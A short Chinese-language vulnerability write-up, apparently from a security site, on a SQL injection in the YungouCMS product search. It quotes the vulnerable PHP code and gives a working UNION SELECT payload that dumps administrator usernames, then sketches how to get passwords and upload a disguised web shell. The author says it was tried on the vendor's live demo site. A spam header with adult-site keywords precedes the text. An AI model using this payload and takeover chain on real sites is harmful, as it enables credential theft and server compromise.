压在透明的玻璃上c-国产精品国产一级A片精品免费-国产精品视频网-成人黄网站18秘 免费看|www.tcsft.com

　　商品搜索可以構建SQL語句！

　　http：//www.yungoucms.cn/？/s_tag/

　　public function tag(){

　　$search =$this->segment(4)；

　　if(！$search)_message("輸入搜索關鍵字")；

　　$search = urldecode($search)；

　　$search = htmlspecialchars($search)；

　　if(！_is_utf8($search)){

　　$search = iconv("GBK"， "UTF-8"， $search)；

　　}

　　$mysql_model=System：：load_sys_class('model')；

　　$title=$search.' – '._cfg('web_name')；

　　$shoplist=$mysql_model->GetList("select thumb，id，sid，zongrenshu，canyurenshu，shenyurenshu，money from `@#_shoplist` WHERE `title` LIKE '%".$search."%'")；

　　$list=count($shoplist)；

　　include templates("search"，"search")；

　　}

　　http：//www.yungoucms.cn/？/s_tag/

　　構建SQL語句“yun%%27 union select 1，2，3，group_concat(username)，5，6，7 from go_admin%23”

　　查看網頁源文件就能得到用戶信息 密碼同樣道理。

　　注入出來的賬號密碼藏入標簽里面去了。查看就OK 。

　　拿到賬號密碼 至于后臺拿shell 可以自己設置上傳的類型

　　添加php后 不過要上傳圖片馬才可以上去。

　　http：//www.yungoucms.cn/？/s_tag/

　　yun%%27 union select 1，2，3，group_concat(username)，5，6，7 from go_admin%23

　　直接官方演示站點測試。